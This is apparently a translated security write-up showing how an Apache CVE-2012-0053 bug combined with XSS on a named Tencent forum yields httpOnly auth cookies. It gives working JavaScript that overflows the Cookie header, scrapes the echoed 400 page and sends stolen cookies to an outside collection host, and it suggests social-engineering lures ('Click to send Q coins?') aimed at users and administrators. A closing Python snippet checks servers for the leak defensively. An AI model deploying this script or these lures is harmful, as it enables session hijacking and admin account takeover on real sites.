http://bbs.open.qq.com/ runs on an Apache server affected by CVE-2012-0053. Combined with a small cross-site scripting issue, this makes it possible to obtain httpOnly cookies.

Test environment: Win7 + Firefox 19

In brief:

1. This forum runs on Apache, and Apache has CVE-2012-0053, which can bypass httpOnly, as you must already know. So we go somewhere on the forum, post a picture, and write in the description: DZ limits the length, so a short domain can be used to embed the code above. A click is required to trigger the cross-site operation. (I remember someone already submitted this hole but forgot the name ...... sorry ...... It is not the focus of this article, so I will not discuss it.) How do we get others to click the image? Make a picture saying "Click to send Q coins?" How about that?

2. The auth cookie of DZ X2.5 is httpOnly, so DZ often ignores XSS vulnerabilities, right? However, because of the Apache vulnerability we can break through httpOnly, for example with the following JS (badly written, please forgive me ......):

```javascript
makeRequest();

function setCookies(good) {
    // Build an 819-byte filler value; ten of these push the Cookie header past Apache's limit
    var str = "";
    for (var i = 0; i < 819; i++) {
        str += "x";
    }
    for (i = 0; i < 10; i++) {
        if (good) {
            // Clean-up pass: expire the filler cookies again
            var cookie = "xss" + i + "=; expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        } else {
            var cookie = "xss" + i + "=" + str + "; path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies() {
        var cookie_dict = {};
        // The unpatched Apache 400 page echoes the offending Cookie header inside <pre>
        if (xhr.readyState === 4 && xhr.status === 400) {
            var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                content = content[1].replace("Cookie:", "");
                // Drop the filler cookies, keep the rest
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                for (var i = 0; i < cookies.length; i++) {
                    var s_c = cookies[i].split('=', 2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            setCookies(true);
            var x = new Image();
            try {
                var myopener = '';
                myopener = window.opener && window.opener.location ? window.opener.location : '';
            } catch (err) {}
            x.src = 'http://www.xxxx.com/save.php?cookie=' + encodeURIComponent(JSON.stringify(cookie_dict));
        }
    }
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "httponly.php", true);
    xhr.send(null);
}
```

3. Then let's look at the information obtained. The cute auth cookie is revealed, isn't it ~~
4. How do you lure the administrator so this can be put to bigger use? That is up to you. I only tested it on my own intranet; it is indeed possible to log in to the admin backend with this cookie. However, the administrator needs to be logged in to the backend, and the request header has to be changed first ~~
Solution:
You know better than me
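Since the flaw is in the server's 400 error page rather than in the cookie itself, the useful check is on the server side. The Python below is an added example (mine, not from the original post) that parses a captured Apache 400 response and lists which cookie names it reflects; the two sample bodies are constructed, modelled on the pre-2.2.22 error page that echoes the header and on a patched page that does not, and the cookie names other than `auth` are placeholders.

```python
import re

# Constructed sample bodies (not captured from any real server): the first mimics the
# pre-2.2.22 Apache 400 page that echoes the offending header, the second a patched one.
VULNERABLE_BODY = (
    "<html><head><title>400 Bad Request</title></head><body>\n"
    "<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "<pre>\nCookie: xss0=" + "x" * 819 + "; auth=EXAMPLE_AUTH; sid=EXAMPLE_SID\n</pre>\n"
    "</p>\n</body></html>\n"
)
PATCHED_BODY = (
    "<html><head><title>400 Bad Request</title></head><body>\n"
    "<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "</p>\n</body></html>\n"
)

_PRE = re.compile(r"<pre>(.*?)</pre>", re.S)
_TOKEN = re.compile(r"[!#$%&'*+.^_`|~0-9A-Za-z-]+")  # RFC 7230 header-name token
_PADDING = re.compile(r"\bxss\d+=x+;?\s*")          # filler cookies like the PoC sets


def echoed_header(body):
    """Return (name, value) if the 400 page reflects a request header in <pre>, else None."""
    m = _PRE.search(body)
    if not m:
        return None
    name, sep, value = m.group(1).strip().partition(":")
    if not sep or not _TOKEN.fullmatch(name.strip()):
        return None
    return name.strip(), value.strip()


def leaked_cookie_names(body):
    """Cookie names a script on the same origin could read back from this response."""
    hdr = echoed_header(body)
    if hdr is None or hdr[0].lower() != "cookie":
        return []
    names = []
    for part in _PADDING.sub("", hdr[1]).split(";"):
        name = part.split("=", 1)[0].strip()
        if name:
            names.append(name)
    return names
```

Feed `leaked_cookie_names` the body of a 400 response captured from your own Apache after sending an oversized header; a non-empty list means the server still discloses httpOnly cookies and needs the 2.2.22 fix or a custom ErrorDocument for 400.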